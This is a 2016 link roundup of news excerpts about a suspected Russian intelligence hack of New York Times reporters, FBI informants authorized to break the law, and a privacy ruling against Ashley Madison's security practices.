https://yro.slashdot.org/story/16/08/23/1831217/fbi-investigating-russian-hack-of-new-york-times-reporters-others
Hackers thought to be working for Russian intelligence have carried out a series of cyber breaches targeting reporters at the New York Times and other U.S. news organizations, reports CNN, citing US officials briefed on the matter. From the report:
The intrusions, detected in recent months, are under investigation by the FBI and other US security agencies. Investigators so far believe that Russian intelligence is likely behind the attacks and that Russian hackers are targeting news organizations as part of a broader series of hacks that also have focused on Democratic Party organizations, the officials said. “Like most news organizations we are vigilant about guarding against attempts to hack into our systems,” said New York Times Co. spokeswoman Eileen Murphy.
First on CNN: FBI investigating Russian hack of New York Times reporters, others
http://edition.cnn.com/2016/08/23/politics/russia-hack-new-york-times-fbi/index.html?adkey=bn
Hackers thought to be working for Russian intelligence have carried out a series of cyber breaches targeting reporters at The New York Times and other US news organizations, according to US officials briefed on the matter.
The intrusions, detected in recent months, are under investigation by the FBI and other US security agencies. Investigators so far believe that Russian intelligence is likely behind the attacks and that Russian hackers are targeting news organizations as part of a broader series of hacks that also have focused on Democratic Party organizations, the officials said.
The Times said email services for employees are outsourced to Google. CNN requested comment from Google but didn’t receive comment. The FBI declined to comment.
Tomi Engdahl says:
FBI Authorized Informants To Break The Law 22,800 Times In 4 Years
https://news.slashdot.org/story/16/08/23/221212/fbi-authorized-informants-to-break-the-law-22800-times-in-4-years
Over a four-year period, the FBI authorized informants to break the law more than 22,800 times, according to newly reviewed documents. Official records obtained by the Daily Dot under the Freedom of Information Act show the Federal Bureau of Investigation gave informants permission at least 5,649 times in 2013 to engage in activity that would otherwise be considered a crime.
FBI authorized informants to break the law 22,800 times in 4 years
http://www.dailydot.com/layer8/fbi-informants-otherwise-criminal-activity-report-foia/
Tomi Engdahl says:
Ashley Madison Security Protocols Violated Canada, Austrialia Privacy Laws
https://news.slashdot.org/story/16/08/23/2113209/ashley-madison-security-protocols-violated-canada-austrialia-privacy-laws
The Office of the Privacy Commissioner of Canada said Tuesday that the Canada-based online dating and social networking service Ashely Madison used inadequate privacy and security technology while marketing itself as a discreet and secure way for consenting adults to have affairs.
AshleyMadison security protocols violated privacy laws, watchdog says
http://www.cbc.ca/news/business/ashley-madison-privacy-security-1.3732413